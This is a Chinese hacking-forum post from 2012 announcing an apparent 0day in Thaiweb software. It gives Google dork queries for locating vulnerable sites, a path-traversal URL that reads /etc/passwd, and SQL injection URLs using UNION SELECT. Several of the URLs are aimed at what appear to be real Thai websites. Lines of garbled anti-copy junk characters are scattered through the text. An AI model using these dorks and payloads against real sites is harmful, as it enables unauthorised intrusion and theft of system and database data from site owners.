中国网络渗透测试联盟

标题: Thaiweb远程文件sql注入漏洞0day [打印本页]

作者: admin    时间: 2012-12-27 08:38
标题: Thaiweb远程文件sql注入漏洞0day
Google之:, l" w+ T& m4 Q3 E4 |
; R) ~) `8 r  l4 u! u& r
intext:powered by Thaiweb
2 F" Z6 |+ O* i+ s3 I: e
) U- t$ K) D! u& l/ ~. _  Ainurl:index.php?page=board.php
2 O5 u( w6 o- z" f5 Q+ J
3 g' [* M- q5 s) N
) O0 d1 Z" `' Z# c
3 R: w. }4 {; i0 I4 h利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
1 l; X% h- e/ g  K
3 H- D- h: Q8 \2 V' h9 |0 J" K   M. B  D* \7 m5 ?0 q
8 c, T0 T# g( t: N
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
; ]3 T6 q9 c! g/ B+ W1 n# G; x( i, N6 A2 Y  C8 i4 L

2 H8 b4 d! ?+ {! J' F: J1 a, f2 A: f5 P7 f
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
6 H7 n5 J9 |9 n& `, M7 o4 Y* _% I3 l5 a* W% G4 V2 E
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--" ?; |$ d* u8 X$ [  D9 z
: b- a, s; s) ~! h* b! @
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
+ Q# _. c: R$ U  j8 e1 v) t




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2